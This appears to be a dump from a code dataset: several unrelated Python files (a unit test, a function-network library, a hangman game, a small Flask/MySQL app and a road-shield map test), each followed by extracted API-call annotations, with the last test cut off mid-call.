] | [((3573, 3592), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (3589, 3592), False, 'import cv2\n'), ((645, 661), 'cv2.flip', 'cv2.flip', (['img', '(1)'], {}), '(img, 1)\n', (653, 661), False, 'import cv2\n'), ((687, 709), 'numpy.copy', 'np.copy', (['self.captured'], {}), '(self.captured)\n', (694, 709), True, 'import numpy as np\n'), ((872, 913), 'haar_cascade.detect_faces', 'cascade.detect_faces', (['self.image.captured'], {}), '(self.image.captured)\n', (892, 913), True, 'import haar_cascade as cascade\n'), ((1091, 1145), 'haar_cascade.detect_eyes', 'cascade.detect_eyes', (['self.image.captured', '(x, y, w, h)'], {}), '(self.image.captured, (x, y, w, h))\n', (1110, 1145), True, 'import haar_cascade as cascade\n'), ((1232, 1287), 'haar_cascade.detect_mouth', 'cascade.detect_mouth', (['self.image.captured', '(x, y, w, h)'], {}), '(self.image.captured, (x, y, w, h))\n', (1252, 1287), True, 'import haar_cascade as cascade\n'), ((1633, 1702), 'cv2.rectangle', 'cv2.rectangle', (['self.image.annotated', '(x, y)', '(x + w, y + h)', 'color', '(2)'], {}), '(self.image.annotated, (x, y), (x + w, y + h), color, 2)\n', (1646, 1702), False, 'import cv2\n'), ((2039, 2106), 'cv2.imwrite', 'cv2.imwrite', (['f"""{output_dir}/img_{now_str}.jpg"""', 'self.image.captured'], {}), "(f'{output_dir}/img_{now_str}.jpg', self.image.captured)\n", (2050, 2106), False, 'import cv2\n'), ((3263, 3316), 'cv2.imshow', 'cv2.imshow', (['"""Smile detector :)"""', 'self.image.annotated'], {}), "('Smile detector :)', self.image.annotated)\n", (3273, 3316), False, 'import cv2\n'), ((994, 1008), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1006, 1008), False, 'from datetime import datetime\n'), ((1756, 1812), 'cv2.rectangle', 'cv2.rectangle', (['face', '(ex, ey)', '(ex + ew, ey + eh)', 'color'], {}), '(face, (ex, ey), (ex + ew, ey + eh), color)\n', (1769, 1812), False, 'import cv2\n'), ((1867, 1923), 'cv2.rectangle', 'cv2.rectangle', (['face', '(ex, ey)', '(ex + ew, ey + eh)', 'color'], {}), '(face, (ex, ey), (ex + ew, ey + eh), color)\n', (1880, 1923), False, 'import cv2\n'), ((3424, 3447), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3445, 3447), False, 'import cv2\n'), ((3464, 3474), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3472, 3474), False, 'import sys\n'), ((3332, 3346), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3343, 3346), False, 'import cv2\n')] |
from unittest import TestCase
from sublime_lib import ResourcePath
from package_util import TemporaryPackage
class TestTemporaryPackage(TestCase):
def test_temporary_package_name(self):
expected_resource_path = ResourcePath('Packages/TemporaryPackageTest')
expected_file_path = expected_resource_path.file_path()
name = 'TemporaryPackageTest'
with TemporaryPackage(name) as path:
self.assertEquals(path.name, name)
self.assertEquals(path, expected_resource_path)
self.assertTrue(expected_file_path.is_dir())
self.assertFalse(expected_file_path.exists())
def test_temporary_package_prefix_suffix(self):
prefix = 'TemporaryPackage'
suffix = 'Test'
with TemporaryPackage(prefix=prefix, suffix=suffix) as path:
self.assertTrue(path.name.startswith(prefix))
self.assertTrue(path.name.endswith(suffix))
def test_temporary_package_arguments_error(self):
with self.assertRaises(ValueError):
TemporaryPackage('TemporaryPackageTest', prefix='foo')
with self.assertRaises(ValueError):
TemporaryPackage('TemporaryPackageTest', suffix='foo')
def test_temporary_package_exclusive(self):
with TemporaryPackage('TemporaryPackageTest'):
with self.assertRaises(FileExistsError):
with TemporaryPackage('TemporaryPackageTest'):
pass
| [
"sublime_lib.ResourcePath",
"package_util.TemporaryPackage"
] | [((227, 272), 'sublime_lib.ResourcePath', 'ResourcePath', (['"""Packages/TemporaryPackageTest"""'], {}), "('Packages/TemporaryPackageTest')\n", (239, 272), False, 'from sublime_lib import ResourcePath\n'), ((389, 411), 'package_util.TemporaryPackage', 'TemporaryPackage', (['name'], {}), '(name)\n', (405, 411), False, 'from package_util import TemporaryPackage\n'), ((766, 812), 'package_util.TemporaryPackage', 'TemporaryPackage', ([], {'prefix': 'prefix', 'suffix': 'suffix'}), '(prefix=prefix, suffix=suffix)\n', (782, 812), False, 'from package_util import TemporaryPackage\n'), ((1047, 1101), 'package_util.TemporaryPackage', 'TemporaryPackage', (['"""TemporaryPackageTest"""'], {'prefix': '"""foo"""'}), "('TemporaryPackageTest', prefix='foo')\n", (1063, 1101), False, 'from package_util import TemporaryPackage\n'), ((1159, 1213), 'package_util.TemporaryPackage', 'TemporaryPackage', (['"""TemporaryPackageTest"""'], {'suffix': '"""foo"""'}), "('TemporaryPackageTest', suffix='foo')\n", (1175, 1213), False, 'from package_util import TemporaryPackage\n'), ((1276, 1316), 'package_util.TemporaryPackage', 'TemporaryPackage', (['"""TemporaryPackageTest"""'], {}), "('TemporaryPackageTest')\n", (1292, 1316), False, 'from package_util import TemporaryPackage\n'), ((1392, 1432), 'package_util.TemporaryPackage', 'TemporaryPackage', (['"""TemporaryPackageTest"""'], {}), "('TemporaryPackageTest')\n", (1408, 1432), False, 'from package_util import TemporaryPackage\n')] |
"""
Base functionality of meshed
"""
from collections import Counter
from dataclasses import dataclass, field
from functools import partial
from typing import Callable, MutableMapping, Iterable, Union, Sized, Sequence
from i2 import Sig, call_somewhat_forgivingly
from meshed.util import ValidationError, NameValidationError, mk_func_name
from meshed.itools import add_edge
def underscore_func_node_names_maker(func: Callable, name=None, out=None):
"""This name maker will resolve names in the following fashion:
#. look at the (func) name and out given as arguments, if None...
#. use mk_func_name(func) to make names.
It will use the mk_func_name(func) itself for out, but suffix the same with
an underscore to provide a mk_func_name.
This is so because here we want to allow easy construction of function networks
where a function's output will be used as another's input argument when
that argument has the the function's (output) name.
"""
if name is not None and out is not None:
return name, out
try:
name_of_func = mk_func_name(func)
except NameValidationError as err:
err_msg = err.args[0]
err_msg += (
f'\nSuggestion: You might want to specify a name explicitly in '
f'FuncNode(func, name=name) instead of just giving me the func as is.'
)
raise NameValidationError(err_msg)
if name is None and out is None:
return name_of_func + '_', name_of_func
elif out is None:
return name, '_' + name
elif name is None:
return name_of_func, out
def basic_node_validator(func_node):
"""Validates a func node. Raises ValidationError if something wrong. Returns None.
Validates:
* that the ``func_node`` params are valid, that is, if not ``None``
* ``func`` should be a callable
* ``name`` and ``out`` should be ``str``
* ``bind`` should be a ``Dict[str, str]``
* that the names (``.name``, ``.out`` and all ``.bind.values()``)
* are valid python identifiers (alphanumeric or underscore not starting with
digit)
* are not repeated (no duplicates)
* that ``.bind.keys()`` are indeed present as params of ``.func``
"""
_func_node_args_validation(
func=func_node.func, name=func_node.name, bind=func_node.bind, out=func_node.out
)
names = [func_node.name, func_node.out, *func_node.bind.values()]
names_that_are_not_strings = [name for name in names if not isinstance(name, str)]
if names_that_are_not_strings:
names_that_are_not_strings = ', '.join(map(str, names_that_are_not_strings))
raise ValidationError(f'Should be strings: {names_that_are_not_strings}')
# Make sure there's no name duplicates
_duplicates = duplicates(names)
if _duplicates:
raise ValidationError(f'{func_node} has duplicate names: {_duplicates}')
# Make sure all names are identifiers
_non_identifiers = list(filter(lambda name: not name.isidentifier(), names))
# print(_non_identifiers, names)
if _non_identifiers:
raise ValidationError(f'{func_node} non-identifier names: {_non_identifiers}')
# Making sure all src_name keys are in the function's signature
bind_names_not_in_sig_names = func_node.bind.keys() - func_node.sig.names
assert not bind_names_not_in_sig_names, (
f"some bind keys weren't found as function argnames: "
f"{', '.join(bind_names_not_in_sig_names)}"
)
# TODO: Think of the hash more carefully.
@dataclass
class FuncNode:
"""A function wrapper that makes the function amenable to operating in a network.
:param func: Function to wrap
:param name: The name to associate to the function
:param bind: The {func_argname: external_name,...} mapping that defines where
the node will source the data to call the function.
This only has to be used if the external names are different from the names
of the arguments of the function.
:param out: The variable name the function should write it's result to
Like we stated: `FuncNode` is meant to operate in computational networks.
But knowing what it does will help you make the networks you want, so we commend
your curiousity, and will oblige with an explanation.
Say you have a function to multiply numbers.
>>> def multiply(x, y):
... return x * y
And you use it in some code like this:
>>> item_price = 3.5
>>> num_of_items = 2
>>> total_price = multiply(item_price, num_of_items)
What the execution of `total_price = multiply(item_price, num_of_items)` does is
- grab the values (in the locals scope -- a dict), of ``item_price`` and ``num_of_items``,
- call the multiply function on these, and then
- write the result to a variable (in locals) named ``total_price``
`FuncNode` is a function wrapper that specification of such a
`output = function(...inputs...)` assignment statement
in such a way that it can carry it out on a `scope`.
A `scope` is a `dict` where the function can find it's input values and write its
output values.
For example, the `FuncNode` form of the above statement would be:
>>> func_node = FuncNode(
... func=multiply,
... bind={'x': 'item_price', 'y': 'num_of_items'})
>>> func_node
FuncNode(item_price,num_of_items -> multiply_ -> multiply)
Note the `bind` is a mapping **from** the variable names of the wrapped function
**to** the names of the scope.
That is, when it's time to execute, it tells the `FuncNode` where to find the values
of its inputs.
If an input is not specified in this `bind` mapping, the scope
(external) name is supposed to be the same as the function's (internal) name.
The purpose of a `FuncNode` is to source some inputs somewhere, compute something
with these, and write the result somewhere. That somewhere is what we call a
scope. A scope is a dictionary (or any mutuable mapping to be precise) and it works
like this:
>>> scope = {'item_price': 3.5, 'num_of_items': 2}
>>> func_node(scope) # see that it returns 7.0
7.0
>>> scope # but also wrote this in the scope
{'item_price': 3.5, 'num_of_items': 2, 'multiply': 7.0}
Consider ``item_price,num_of_items -> multiply_ -> multiply``.
See that the name of the function is used for the name of its output,
and an underscore-suffixed name for its function name.
That's the default behavior if you don't specify either a name (of the function)
for the `FuncNode`, or a `out`.
The underscore is to distinguish from the name of the function itself.
The function gets the underscore because this favors particular naming style.
You can give it a custom name as well.
>>> FuncNode(multiply, name='total_price', out='daily_expense')
FuncNode(x,y -> total_price -> daily_expense)
If you give an `out`, but not a `name` (for the function), the function's
name will be taken:
>>> FuncNode(multiply, out='daily_expense')
FuncNode(x,y -> multiply -> daily_expense)
If you give a `name`, but not a `out`, an underscore-prefixed version of
the `name` will be taken:
>>> FuncNode(multiply, name='total_price')
FuncNode(x,y -> total_price -> _total_price)
Note: In the context of networks if you want to reuse a same function
(say, `multiply`) in multiple places
you'll **need** to give it a custom name because the functions are identified by
this name in the network.
"""
func: Callable
name: str = field(default=None)
bind: dict = field(default_factory=dict)
out: str = field(default=None)
func_label: str = field(default=None) # TODO: Integrate more
write_output_into_scope: bool = True # TODO: Do we really want to allow False?
names_maker: Callable = underscore_func_node_names_maker
node_validator: Callable = basic_node_validator
def __post_init__(self):
_func_node_args_validation(func=self.func, name=self.name, out=self.out)
self.name, self.out = self.names_maker(self.func, self.name, self.out)
self.__name__ = self.name
# self.__name__ = self.name
# The wrapped function's signature will be useful
# when interfacing with it and the scope.
self.sig = Sig(self.func)
# replace integer bind keys with their corresponding name
self.bind = _bind_where_int_keys_repl_with_argname(self.bind, self.sig.names)
# complete bind with the argnames of the signature
_complete_dict_with_iterable_of_required_keys(self.bind, self.sig.names)
_func_node_args_validation(bind=self.bind)
self.extractor = partial(_mapped_extraction, to_extract=self.bind)
if self.func_label is None:
self.func_label = self.name
self.node_validator(self)
def synopsis_string(self):
return f"{','.join(self.bind.values())} -> {self.name} " f'-> {self.out}'
def __repr__(self):
return f'FuncNode({self.synopsis_string()})'
def call_on_scope(self, scope: MutableMapping):
"""Call the function using the given scope both to source arguments and write
results.
Note: This method is only meant to be used as a backend to __call__, not as
an actual interface method. Additional control/constraints on read and writes
can be implemented by providing a custom scope for that."""
relevant_kwargs = dict(self.extractor(scope))
args, kwargs = self.sig.args_and_kwargs_from_kwargs(relevant_kwargs)
output = call_somewhat_forgivingly(
self.func, args, kwargs, enforce_sig=self.sig
)
if self.write_output_into_scope:
scope[self.out] = output
return output
def _hash_str(self):
"""Design ideo.
Attempt to construct a hash that reflects the actual identity we want.
Need to transform to int. Only identifier chars alphanumerics and underscore
and space are used, so could possibly encode as int (for __hash__ method)
in a way that is reverse-decodable and with reasonable int size.
"""
return ';'.join(self.bind) + '::' + self.out
# TODO: Find a better one
def __hash__(self):
return hash(self._hash_str())
def __call__(self, scope):
"""Deprecated: Don't use. Might be a normal function with a signature"""
return self.call_on_scope(scope)
@classmethod
def has_as_instance(cls, obj):
"""Verify if ``obj`` is an instance of a FuncNode (or specific sub-class).
The usefulness of this method is to not have to make a lambda with isinstance
when filtering.
>>> FuncNode.has_as_instance(FuncNode(lambda x: x))
True
>>> FuncNode.has_as_instance("I am not a FuncNode: I'm a string")
False
"""
return isinstance(obj, cls)
def validate_that_func_node_names_are_sane(func_nodes: Iterable[FuncNode]):
"""Assert that the names of func_nodes are sane.
That is:
* are valid dot (graphviz) names (we'll use str.isidentifier because lazy)
* All the ``func.name`` and ``func.out`` are unique
* more to come (TODO)...
"""
func_nodes = list(func_nodes)
node_names = [x.name for x in func_nodes]
outs = [x.out for x in func_nodes]
assert all(
map(str.isidentifier, node_names)
), f"some node names weren't valid identifiers: {node_names}"
assert all(
map(str.isidentifier, outs)
), f"some return names weren't valid identifiers: {outs}"
if len(set(node_names) | set(outs)) != 2 * len(func_nodes):
c = Counter(node_names + outs)
offending_names = [name for name, count in c.items() if count > 1]
raise ValueError(
f'Some of your node names and/or outs where used more than once. '
f"They shouldn't. These are the names I find offensive: {offending_names}"
)
def _mk_func_nodes(func_nodes):
# TODO: Take care of names (or track and take care if collision)
for func_node in func_nodes:
if is_func_node(func_node):
yield func_node
elif isinstance(func_node, Callable):
yield FuncNode(func_node)
else:
raise TypeError(f"Can't convert this to a FuncNode: {func_node}")
def _func_nodes_to_graph_dict(func_nodes):
g = dict()
for f in func_nodes:
for src_name in f.bind.values():
add_edge(g, src_name, f)
add_edge(g, f, f.out)
return g
def is_func_node(obj) -> bool:
"""
>>> is_func_node(FuncNode(lambda x: x))
True
>>> is_func_node("I am not a FuncNode: I'm a string")
False
"""
# A weaker check than an isinstance(obj, FuncNode), which fails when we're
# developing (therefore changing) FuncNode definition (without relaunching python
# kernel). This is to be used instead, at least during development times
# TODO: Replace with isinstance(obj, FuncNode) is this when development
# stabalizes
# return isinstance(obj, FuncNode)
cls = type(obj)
if cls is not type:
return any(getattr(x, '__name__', '') == 'FuncNode' for x in cls.mro())
else:
return False
def is_not_func_node(obj) -> bool:
"""
>>> is_not_func_node(FuncNode(lambda x: x))
False
>>> is_not_func_node("I am not a FuncNode: I'm a string")
True
"""
return not FuncNode.has_as_instance(obj)
def get_init_params_of_instance(obj):
"""Get names of instance object ``obj`` that are also parameters of the
``__init__`` of its class"""
return {k: v for k, v in vars(obj).items() if k in Sig(type(obj)).names}
def ch_func_node_attrs(fn, **new_attrs_values):
"""Returns a copy of the func node with some of it's attributes changed
>>> def plus(a, b):
... return a + b
...
>>> def minus(a, b):
... return a - b
...
>>> fn = FuncNode(func=plus, out='sum')
>>> fn.func == plus
True
>>> fn.name == 'plus'
True
>>> new_fn = ch_func_node_attrs(fn, func=minus)
>>> new_fn.func == minus
True
>>> new_fn.synopsis_string() == 'a,b -> plus -> sum'
True
>>>
>>>
>>> newer_fn = ch_func_node_attrs(fn, func=minus, name='sub', out='difference')
>>> newer_fn.synopsis_string() == 'a,b -> sub -> difference'
True
"""
init_params = get_init_params_of_instance(fn)
if params_that_are_not_init_params := (new_attrs_values.keys() - init_params):
raise ValueError(
f'These are not params of {type(fn).__name__}: '
f'{params_that_are_not_init_params}'
)
fn_kwargs = dict(init_params, **new_attrs_values)
return FuncNode(**fn_kwargs)
def _keys_and_values_are_strings_validation(d: dict):
for k, v in d.items():
if not isinstance(k, str):
raise ValidationError(f'Should be a str: {k}')
if not isinstance(v, str):
raise ValidationError(f'Should be a str: {v}')
def _func_node_args_validation(
*, func: Callable = None, name: str = None, bind: dict = None, out: str = None
):
"""Validates the four first arguments that are used to make a ``FuncNode``.
Namely, if not ``None``,
* ``func`` should be a callable
* ``name`` and ``out`` should be ``str``
* ``bind`` should be a ``Dict[str, str]``, ``Dict[int, str]`` or ``List[str]``
* ``out`` should be a str
"""
if func is not None and not isinstance(func, Callable):
raise ValidationError(f'Should be callable: {func}')
if name is not None and not isinstance(name, str):
raise ValidationError(f'Should be a str: {name}')
if bind is not None:
if not isinstance(bind, dict):
raise ValidationError(f'Should be a dict: {bind}')
_keys_and_values_are_strings_validation(bind)
if out is not None and not isinstance(out, str):
raise ValidationError(f'Should be a str: {out}')
def _old_mapped_extraction(extract_from: dict, key_map: dict):
"""Deprecated: Old version of _mapped_extraction.
for every (k, v) of key_map whose v is a key of extract_from, yields
(v, extract_from[v])
Meant to be curried into an extractor, and wrapped in dict.
>>> extracted = _old_mapped_extraction(
... {'a': 1, 'b': 2, 'c': 3}, # extract_from
... {'A': 'a', 'C': 'c', 'D': 'd'} # note that there's no 'd' in extract_from
... )
>>> dict(extracted)
{'a': 1, 'c': 3}
"""
for k, v in key_map.items():
if v in extract_from:
yield v, extract_from[v]
def _mapped_extraction(src: dict, to_extract: dict):
"""for every (desired_name, src_name) of to_extract whose v is a key of source,
yields (desired_name, source[src_name])
It's purpose is to extract inputs from a src.
The names used in the src may be different from those desired by the function,
those to_extract specifies what to extract by a {desired_name: src_name, ...}
map.
_mapped_extraction_ is mant to be curried into an extractor.
>>> extracted = _mapped_extraction(
... src={'A': 1, 'B': 2, 'C': 3},
... to_extract={'a': 'A', 'c': 'C', 'd': 'D'} # note that there's no 'd' here
... )
>>> dict(extracted)
{'a': 1, 'c': 3}
"""
for desired_name, src_name in to_extract.items():
if src_name in src:
yield desired_name, src[src_name]
def duplicates(elements: Union[Iterable, Sized]):
c = Counter(elements)
if len(c) != len(elements):
return [name for name, count in c.items() if count > 1]
else:
return []
def _bind_where_int_keys_repl_with_argname(bind: dict, names: Sequence[str]) -> dict:
"""
:param bind: A bind dict, as used in FuncNode
:param names: A sequence of strings
:return: A bind dict where integer keys were replaced with the corresponding
name from names.
>>> bind = {0: 'a', 1: 'b', 'c': 'x', 'd': 'y'}
>>> names = 'e f g h'.split()
>>> _bind_where_int_keys_repl_with_argname(bind, names)
{'e': 'a', 'f': 'b', 'c': 'x', 'd': 'y'}
"""
def transformed_items():
for k, v in bind.items():
if isinstance(k, int):
argname = names[k]
yield argname, v
else:
yield k, v
return dict(transformed_items())
def _complete_dict_with_iterable_of_required_keys(
to_complete: dict, complete_with: Iterable
):
"""Complete `to_complete` (in place) with `complete_with`
`complete_with` contains values that must be covered by `to_complete`
Those values that are not covered will be inserted in to_complete,
with key=val
>>> d = {'a': 'A', 'c': 'C'}
>>> _complete_dict_with_iterable_of_required_keys(d, 'abc')
>>> d
{'a': 'A', 'c': 'C', 'b': 'b'}
"""
keys_already_covered = set(to_complete)
for required_key in complete_with:
if required_key not in keys_already_covered:
to_complete[required_key] = required_key
| [
"i2.Sig",
"meshed.util.mk_func_name",
"i2.call_somewhat_forgivingly",
"collections.Counter",
"meshed.util.NameValidationError",
"functools.partial",
"meshed.itools.add_edge",
"meshed.util.ValidationError",
"dataclasses.field"
] | [((7642, 7661), 'dataclasses.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (7647, 7661), False, 'from dataclasses import dataclass, field\n'), ((7679, 7706), 'dataclasses.field', 'field', ([], {'default_factory': 'dict'}), '(default_factory=dict)\n', (7684, 7706), False, 'from dataclasses import dataclass, field\n'), ((7722, 7741), 'dataclasses.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (7727, 7741), False, 'from dataclasses import dataclass, field\n'), ((7764, 7783), 'dataclasses.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (7769, 7783), False, 'from dataclasses import dataclass, field\n'), ((17615, 17632), 'collections.Counter', 'Counter', (['elements'], {}), '(elements)\n', (17622, 17632), False, 'from collections import Counter\n'), ((1093, 1111), 'meshed.util.mk_func_name', 'mk_func_name', (['func'], {}), '(func)\n', (1105, 1111), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((2677, 2744), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be strings: {names_that_are_not_strings}"""'], {}), "(f'Should be strings: {names_that_are_not_strings}')\n", (2692, 2744), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((2859, 2925), 'meshed.util.ValidationError', 'ValidationError', (['f"""{func_node} has duplicate names: {_duplicates}"""'], {}), "(f'{func_node} has duplicate names: {_duplicates}')\n", (2874, 2925), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((3126, 3198), 'meshed.util.ValidationError', 'ValidationError', (['f"""{func_node} non-identifier names: {_non_identifiers}"""'], {}), "(f'{func_node} non-identifier names: {_non_identifiers}')\n", (3141, 3198), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((8392, 8406), 'i2.Sig', 'Sig', (['self.func'], {}), '(self.func)\n', (8395, 8406), False, 'from i2 import Sig, call_somewhat_forgivingly\n'), ((8777, 8826), 'functools.partial', 'partial', (['_mapped_extraction'], {'to_extract': 'self.bind'}), '(_mapped_extraction, to_extract=self.bind)\n', (8784, 8826), False, 'from functools import partial\n'), ((9674, 9746), 'i2.call_somewhat_forgivingly', 'call_somewhat_forgivingly', (['self.func', 'args', 'kwargs'], {'enforce_sig': 'self.sig'}), '(self.func, args, kwargs, enforce_sig=self.sig)\n', (9699, 9746), False, 'from i2 import Sig, call_somewhat_forgivingly\n'), ((11757, 11783), 'collections.Counter', 'Counter', (['(node_names + outs)'], {}), '(node_names + outs)\n', (11764, 11783), False, 'from collections import Counter\n'), ((12609, 12630), 'meshed.itools.add_edge', 'add_edge', (['g', 'f', 'f.out'], {}), '(g, f, f.out)\n', (12617, 12630), False, 'from meshed.itools import add_edge\n'), ((15636, 15682), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be callable: {func}"""'], {}), "(f'Should be callable: {func}')\n", (15651, 15682), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((15752, 15795), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be a str: {name}"""'], {}), "(f'Should be a str: {name}')\n", (15767, 15795), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((16044, 16086), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be a str: {out}"""'], {}), "(f'Should be a str: {out}')\n", (16059, 16086), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((1386, 1414), 'meshed.util.NameValidationError', 'NameValidationError', (['err_msg'], {}), '(err_msg)\n', (1405, 1414), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((12576, 12600), 'meshed.itools.add_edge', 'add_edge', (['g', 'src_name', 'f'], {}), '(g, src_name, f)\n', (12584, 12600), False, 'from meshed.itools import add_edge\n'), ((14991, 15031), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be a str: {k}"""'], {}), "(f'Should be a str: {k}')\n", (15006, 15031), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((15085, 15125), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be a str: {v}"""'], {}), "(f'Should be a str: {v}')\n", (15100, 15125), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((15878, 15922), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be a dict: {bind}"""'], {}), "(f'Should be a dict: {bind}')\n", (15893, 15922), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n')] |
#!/usr/bin/env python3
"""Hangman game"""
import argparse
import io
import random
import re
import sys
# --------------------------------------------------
def get_args():
"""parse arguments"""
parser = argparse.ArgumentParser(
description='Hangman',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-l',
'--maxlen',
help='Max word length',
type=int,
default=10)
parser.add_argument('-n',
'--minlen',
help='Min word length',
type=int,
default=5)
parser.add_argument('-m',
'--misses',
help='Max number of misses',
type=int,
default=10)
parser.add_argument('-s',
'--seed',
help='Random seed',
type=str,
default=None)
parser.add_argument('-w',
'--wordlist',
help='Word list',
type=argparse.FileType('r'),
default='/usr/share/dict/words')
parser.add_argument('-i',
'--inputs',
help='Input choices',
type=str,
default='')
args = parser.parse_args()
if args.minlen < 1:
parser.error('--minlen "{}" must be positive'.format(args.minlen))
if args.maxlen > 20:
parser.error('--maxlen "{}" must be < 20'.format(args.maxlen))
if args.minlen > args.maxlen:
parser.error('--minlen "{}" is greater than --maxlen "{}"'.format(
args.minlen, args.maxlen))
return args
# --------------------------------------------------
def get_words(wordlist, min_len, max_len):
"""Read wordlist (file handle), return words in range(min_len, max_len)"""
good = '^[a-z]{' + str(min_len) + ',' + str(max_len) + '}$'
is_good = lambda w: re.match(good, w)
return list(filter(is_good, wordlist.read().lower().split()))
# --------------------------------------------------
def main():
"""main"""
args = get_args()
words = get_words(args.wordlist, args.minlen, args.maxlen)
random.seed(args.seed)
result = play({
'word': random.choice(words),
'max_misses': args.misses,
'inputs': list(args.inputs),
})
print('You win!' if result else 'You lose, loser!')
# --------------------------------------------------
def play(state):
"""Play a round given a `dict` of the current state of the game"""
word = state.get('word')
if not word:
print('No word!')
return False
guessed = state.get('guessed', list('_' * len(word)))
prev_guesses = state.get('prev_guesses', set())
num_misses = state.get('num_misses', 0)
max_misses = state.get('max_misses', 10)
inputs = state.get('inputs', [])
if ''.join(guessed) == word:
msg = 'You guessed "{}" with "{}" miss{}.'
print(msg.format(word, num_misses, '' if num_misses == 1 else 'es'))
return True
if num_misses >= max_misses:
print('The word was "{}."'.format(word))
return False
print('{} (Misses: {})'.format(' '.join(guessed), num_misses))
get_char = lambda: input('Your guess? ("?" for hint, "!" to quit) ').lower(
)
new_guess = inputs.pop(0) if inputs else get_char()
if new_guess == '!':
print('Better luck next time.')
return False
elif new_guess == '?':
new_guess = random.choice([c for c in word if c not in guessed])
num_misses += 1
if not re.match('^[a-z]$', new_guess):
print('"{}" is not a letter.'.format(new_guess))
num_misses += 1
elif new_guess in prev_guesses:
print('You already guessed that.')
elif new_guess in word:
prev_guesses.add(new_guess)
last_pos = 0
while True:
pos = word.find(new_guess, last_pos)
if pos < 0:
break
elif pos >= 0:
guessed[pos] = new_guess
last_pos = pos + 1
else:
print('There is no "{}."'.format(new_guess))
num_misses += 1
return play({
'word': word,
'guessed': guessed,
'num_misses': num_misses,
'prev_guesses': prev_guesses,
'max_misses': max_misses,
'inputs': inputs,
})
# --------------------------------------------------
if __name__ == '__main__':
main()
| [
"argparse.FileType",
"random.choice",
"argparse.ArgumentParser",
"re.match",
"random.seed"
] | [((215, 322), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Hangman"""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description='Hangman', formatter_class=argparse.\n ArgumentDefaultsHelpFormatter)\n", (238, 322), False, 'import argparse\n'), ((2396, 2418), 'random.seed', 'random.seed', (['args.seed'], {}), '(args.seed)\n', (2407, 2418), False, 'import random\n'), ((2140, 2157), 're.match', 're.match', (['good', 'w'], {}), '(good, w)\n', (2148, 2157), False, 'import re\n'), ((3807, 3837), 're.match', 're.match', (['"""^[a-z]$"""', 'new_guess'], {}), "('^[a-z]$', new_guess)\n", (3815, 3837), False, 'import re\n'), ((1215, 1237), 'argparse.FileType', 'argparse.FileType', (['"""r"""'], {}), "('r')\n", (1232, 1237), False, 'import argparse\n'), ((2455, 2475), 'random.choice', 'random.choice', (['words'], {}), '(words)\n', (2468, 2475), False, 'import random\n'), ((3718, 3770), 'random.choice', 'random.choice', (['[c for c in word if c not in guessed]'], {}), '([c for c in word if c not in guessed])\n', (3731, 3770), False, 'import random\n')] |
from flask import Flask, request, jsonify
from sqlalchemy import create_engine
app = Flask(__name__)
engine = create_engine("mysql+pymysql://root:admin@db:3306/mydb")
@app.route("/members", methods=["POST"])
def members():
body = request.json
with engine.connect() as connection:
connection.execute("INSERT INTO members (name) VALUES (%s)", body["name"])
row = list(
connection.execute("SELECT * FROM members WHERE id=LAST_INSERT_ID()")
)[0]
return jsonify({"id": row.id, "name": row.name})
if __name__ == "__main__":
app.run(debug=True, host="0.0.0.0", port=8080)
| [
"flask.jsonify",
"sqlalchemy.create_engine",
"flask.Flask"
] | [((87, 102), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (92, 102), False, 'from flask import Flask, request, jsonify\n'), ((112, 168), 'sqlalchemy.create_engine', 'create_engine', (['"""mysql+pymysql://root:admin@db:3306/mydb"""'], {}), "('mysql+pymysql://root:admin@db:3306/mydb')\n", (125, 168), False, 'from sqlalchemy import create_engine\n'), ((504, 545), 'flask.jsonify', 'jsonify', (["{'id': row.id, 'name': row.name}"], {}), "({'id': row.id, 'name': row.name})\n", (511, 545), False, 'from flask import Flask, request, jsonify\n')] |
# -*- encoding: utf-8 -*-
from . import FixtureTest
class AustraliaShieldTextPrefixesTest(FixtureTest):
def test_m(self):
import dsl
z, x, y = (16, 60295, 39334)
self.generate_fixtures(
dsl.is_in('AU', z, x, y),
# https://www.openstreetmap.org/way/170318728
dsl.way(170318728, dsl.tile_diagonal(z, x, y), {
'bicycle': u'no',
'highway': u'motorway',
'lanes': u'2',
'layer': u'-1',
'maxspeed': u'80',
'name': u'Eastern Distributor',
'old_network': u'MR',
'old_ref': u'1',
'oneway': u'yes',
'ref': u'M1',
'ref:start_date': u'2013-08',
'source': u'openstreetmap.org',
'surface': u'asphalt',
'toll': u'yes',
}),
dsl.relation(1, {
'addr:country': u'AU',
'addr:state': u'NSW',
'ref': u'M1',
'route': u'road',
'source': u'openstreetmap.org',
'type': u'route',
}, ways=[170318728]),
)
self.assert_has_feature(
z, x, y, 'roads', {
'id': 170318728,
'shield_text': 'M1',
'network': 'AU:M-road',
})
def test_a(self):
import dsl
z, x, y = (16, 60290, 39332)
self.generate_fixtures(
